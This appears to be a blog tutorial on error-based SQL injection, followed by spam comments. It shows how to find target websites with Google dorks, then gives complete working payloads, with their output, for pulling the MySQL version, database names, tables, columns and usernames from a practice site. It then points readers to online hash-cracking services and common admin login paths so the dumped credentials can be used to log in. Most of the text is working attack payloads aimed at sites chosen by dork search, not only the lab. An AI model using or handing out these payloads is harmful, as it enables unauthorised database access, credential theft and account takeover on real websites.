I introduction
Hey guys.. Today im gonna teach you error based SQL Injection!
What is the difference between Union Based and Error based?
The difference between Union and Error based are
1) union is harder than error based i think
2) Union based is where you will select all the columns and inject in the injectable column. While error based is you'll make an error that will dump the information
3) You dont need to count the vulnerable columns in error based.
II Learning basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5
So what's next?
2) SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia
3) SQL Injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database
so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.
III Gathering
So after learning some basics we will now gather some information
Part 1 : Finding target website
To find a target website, we will need to use google dorks
lets google : " inurl:page.php?id= "
You can make your own dork if you want, here is some examples :
inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19
So get some target and lets start.
Part 2 : Checking if vulnerable
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
If you see something like this :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
if it doesnt load normally and it shows an error that doesnt look like that, i suggest you checking my article about union based sql injection
If it loads normally, then you should get another target
Part 3 : Getting right comment
So after we learn how to check if its vulnerable to error based, we will now check check the right comment. So try adding " '--+ " after the ID number.
the url now will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+
If page loads normally then the id is a string, but if the page loads with error then the id is integer, then the comment is --
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--
In my target, the right comment is '--+
Part 4 : Checking version
So lets verify that its really vulnerable to Error Based by getting version
so simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
there we go we got the version
Duplicate entry '5.5.48-cll:1' for key 'group_key'
the version of mysql is 5.5.48-cll
Part 5 : Getting databases
After getting the version,we will now get the database names this is our payload +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
And there we go! we got the database name. If you want to check for other databases then use this payload +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'information_schema~1' for key 'group_key'
so the first database is information_schema
now increase the LIMIT in the payload by 1 to check the next database name.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'leettime_761wHole~1' for key 'group_key'
Second database name is leettime_761wHole . Then lets check the third database
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
If the page loads normally, then the third base doesnt exist.
Part 6 : Getting tables
After getting the database names, we will now try to get the tables of that database.
the database name in my target is leettime_761wHole
Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"
Our payload to get the database is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
So our link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'testtable1~1' for key 'group_key'
The first table is : testtable1
lets check for the another table by increasing the limit by 1
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'userlogs~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'users~1' for key 'group_key'
And keep increasing the limit number to get the tables
Part 7 : Getting columns
So after getting tables and databases, we will now get the columns.
Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
add 0x also.
The url will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'id~1' for key 'group_key'
the first column is id, again, increase the limit to get the next column
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'username~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'password~1' for key 'group_key'
and again and again...
Part 8 : Dumping data
After we got the database, table and columns.. Now its time to dump the data! YAY!
Our payload to get dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
* NOTE: YOU CANNOT GET MULTIPLE COLUMNS. LIKE username,0x3a,password . IT WILL NOT WORK *
So the url will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'admin~1' for key 'group_key'
again, increase the limit by 1.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'decompiler~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'devilhunte~1' for key 'group_key'
and increase then increase then increase.
IV Getting login panel
So what's the point of getting the login credentials if you're not gonna use it for login?
Some of passwords are hashed, like md5,SHA1 etc.. You can decrypt those md5 and others in md5online.com , crackstation.net ,
There is so many tools to get the login panel, but the common panels are
www.website.com/admin
www.website.com/administrator
www.website.com/admin.php
www.website.com/administrator.php
www.website.com/login.php
www.website.com/cms
V Goodbye
Thank you for reading this tutorial hope you learn something! If you have some questions or feedback please don't hesitate to comment!
dasdad
ReplyDeletewww.sterndrive.info/omc_help_page.html
ReplyDeleteVery good points you wrote here..Great stuff...I think you've made some truly interesting points.Keep up the good work. logo design
ReplyDeleteThank you so much for sharing this great blog.Very inspiring and helpful too.Hope you continue to share more of your ideas.I will definitely love to read. logo design
ReplyDeleteIt is, without uncertainty, that the decision of typeface is the fundamental of each great logo plan. I see such a significant number of terrible decisions. It's anything but a handy solution. logo design service
ReplyDeleteSugarboo Extra Long Digital Titanium Styler, 10.0 oz
ReplyDeleteFind babyliss pro titanium straightener Sugarboo ford fusion hybrid titanium Extra Long Digital Titanium Styler price of titanium - 10.0 titanium blue oz and other sugar products at Titanium-arts.com. sunscreen with titanium dioxide